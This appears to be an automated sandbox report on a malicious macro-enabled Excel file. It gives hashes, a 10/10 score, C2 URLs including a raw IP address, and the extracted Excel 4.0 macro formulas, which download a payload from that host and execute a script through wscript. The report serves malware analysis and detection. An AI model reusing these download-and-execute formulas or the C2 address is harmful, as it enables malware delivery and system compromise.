General

  • Target

    3dfd7a05888079316ce4d1e98b764ac0

  • Size

    6KB

  • MD5

    3dfd7a05888079316ce4d1e98b764ac0

  • SHA1

    44f73eef6152576b3e577ac205b88cd008e28df8

  • SHA256

    4fd0627e41ee9246f051cdc8765e01a0693bbb1fae8737d6bb365abd5e9afec9

  • SHA512

    294d4b8ebd5b90f1fa031c9d0a78b0198fd4d4f2d9fdc359073ed55b42420055ddb5add0354207f25ebf5fbea0f471afca698cb5d8a59acf8a60102e60e41627

  • SSDEEP

    192:NDS6uSgbrA2OmmfRX8UhHFBFYuJb98yga+G:NBuxM2wN1FYIb98ygG

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • 3dfd7a05888079316ce4d1e98b764ac0
    .xlsm office2007